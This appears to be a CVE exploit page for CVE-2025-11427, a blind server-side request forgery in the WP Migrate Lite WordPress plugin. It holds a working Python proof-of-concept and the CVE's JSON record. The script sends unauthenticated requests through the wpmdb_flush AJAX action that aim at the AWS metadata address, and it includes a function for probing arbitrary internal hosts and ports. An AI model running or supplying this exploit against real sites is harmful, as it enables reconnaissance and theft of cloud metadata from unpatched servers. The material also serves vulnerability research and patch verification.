CVE-2025-11427

import requests import sys # CVE-2025-11427 PoC - Blind SSRF in WP Migrate Lite # Target: WordPress site with WP Migrate Lite plugin <= 2.7.6 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-11427 Attempts to make a request to AWS metadata service """ ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Vulnerable parameters for wpmdb_flush action data = { 'action': 'wpmdb_flush', 'url': 'http://169.254.169.254/latest/meta-data/', 'verify_ssl': 0 } try: print(f"[*] Testing target: {target_url}") print(f"[*] Sending malicious request to {ajax_url}") response = requests.post(ajax_url, data=data, timeout=10, verify=False) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") # Check for signs of successful SSRF if response.status_code == 200 or 'ami-id' in response.text: print("[!] VULNERABLE - Server may be making arbitrary requests") return True else: print("[*] Target may be patched or not vulnerable") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def exploit_ssrf(target_url, internal_host, internal_port=80): """ Exploit SSRF to probe internal services """ ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Target internal service target = f"http://{internal_host}:{internal_port}" data = { 'action': 'wpmdb_flush', 'url': target, 'verify_ssl': 0 } print(f"[*] Probing internal service: {target}") try: response = requests.post(ajax_url, data=data, timeout=5, verify=False) print(f"[+] Internal service responded with status: {response.status_code}") return True except requests.exceptions.Timeout: print("[*] Request timed out - service may be down or filtered") return False except: print("[*] Could not reach internal service") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-11427.py <target_url>") print("Example: python cve-2025-11427.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

{"cve": {"id": "CVE-2025-11427", "sourceIdentifier": "[email protected]", "published": "2025-11-18T11:15:44.193", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Migrate Lite – WordPress Migration Made Easy plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.7.6 via the wpmdb_flush AJAX action. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to obtain information about internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-migrate-db/tags/2.7.5/class/Common/Migration/Flush.php#L69", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-migrate-db/tags/2.7.5/class/Common/MigrationPersistence/Persistence.php#L50", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-11427/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4b098711-ed01-4a71-b0df-30ff4fffa930?source=cve", "source": "[email protected]"}]}}